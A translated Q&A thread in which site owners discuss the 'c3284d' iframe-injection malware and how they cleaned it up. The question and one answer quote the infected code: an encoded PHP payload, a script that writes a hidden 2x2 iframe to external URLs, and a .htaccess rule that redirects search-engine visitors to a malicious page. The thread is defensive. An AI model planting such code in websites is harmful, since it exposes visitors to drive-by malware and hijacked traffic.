网站iframe攻击 - 将代码插入源代码

时间:2012-07-11 07:08:30

标签: php iframe code-injection

在过去的几天里,我的网站一再成为iframe攻击的目标。代码主要附加到PHP和Javascript页面。然后代码是PHP base 64编码,参见示例(我稍微更改了代码以中和它):

#c3284d#
echo(gzinflate(base64_decode("aJ1yhA3pkW4cWnUnmFluNmeq66wqE0OmVRcMUP3WQAupFZFGgaJvSE7IZH67z5S8    VwMxbWwg/TRkFvtPyCw9AGGzqRm8Qi/1LV6+9MdTtf9rtXb8e4L")));
#/c3284d#

这个解码看起来像这样:

<script type="text/javascript">
    document.write(
        '<iframe src="http://opticmoxie.com/xxxxxxx.php"     
         name="Twitter" scrolling="auto" frameborder="no" 
         align="center" height="2" width="2"></iframe>'
    );

一个共同点是所有代码都有注释“#c3284d#”,因此跟踪恶意代码并不困难。但这很耗时...

我们在Gradwell(英国)的共享服务器上,他们并没有特别有帮助。 所以问题是我能做些什么来阻止这个问题重复? 我知道MySQL注入攻击并使用PHP的mysql_real_escape_string来防范此类攻击。

该网站是PHP和MySQL驱动器。 我们使用MySQLFTP并拥有一个用于SSH访问的shell帐户。 我们使用Wordpress(插件取消激活的最新更新)。

7 个答案:

答案 0 :(得分:1)

我有同样的问题。 FTP服务器的访问日志显示修改是使用被黑客入侵的FTP密码进行的。

答案 1 :(得分:1)

我在许多不同的域上遇到了同样的问题和不同黑客文件的变种。我注意到的一个常见问题是Wordpress。我们在许多服务器上都有wordpress,我认为这是常见的罪魁祸首。我已经更新了所有的wordpress帐户,更改了所有域帐户的所有pwords。不确定问题是否已完全解决。

答案 2 :(得分:1)

在我管理的所有Wordpress网站上遇到同样的问题。没有找到感染源,我打赌它是我的电脑上的一些蠕虫或它是我在所有网站上安装的插件。

我发现所有在WP-Better安全插件日志中修改过的文件并删除了其他受感染的代码,之后我对所有感染源文件发出chmod 444。

现在即时免费,因为1个月的邪恶iframes / htacess和其他东西。

答案 3 :(得分:1)

我遇到了同样的问题,发现他们以前使用的方法是一个被黑客入侵的ftp密码。

即使这是在启用了CPHulk暴力保护的cPanel服务器上运行,我发现黑客试图通过数千个不同的受感染主机强行进入。

幸运的是,我记录了所有上传的文件,因此我编写了一个脚本来从备份中恢复这些文件。

然后,我通过减少帐户锁定前所需的失败尝试次数来增加cPanel强力保护级别。

答案 4 :(得分:1)

我建议你看看这个:
http://websiteprotection.blogspot.pt/2009/10/measures-to-prevent-and-detect-iframe.html
它还有一个脚本来清理它。

答案 5 :(得分:0)

我也有同样的问题。在我的例子中,附加的代码是

<!--c3284d--><script type="text/javascript">
document.write('<iframe src="http://poseyhumane.org/stats.php" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->

此外,还有一个.htaccess文件如下:

> #c3284d# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER}
> ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
> RewriteRule ^(.*)$ http://onestopchinasource.com/catalog/stats.php
> [R=301,L] </IfModule>
> #/c3284d#

我发现了两篇关于这个问题的文章: http://www.webmasterworld.com/html/4472821.htmhttp://stopmalvertising.com/malware-reports/the-c3284d-malware-network-stats.php.html

希望有所帮助

答案 6 :(得分:-1)

坏人有权访问你的代码,所以你必须关闭他们的访问权限,同时你可以使用一个简单的脚本来检查和删除检测到gzinflate的所有行(base64_decode,但即使是最好的代码(校验和检查器)备份文件)如果仍有访问权限将无用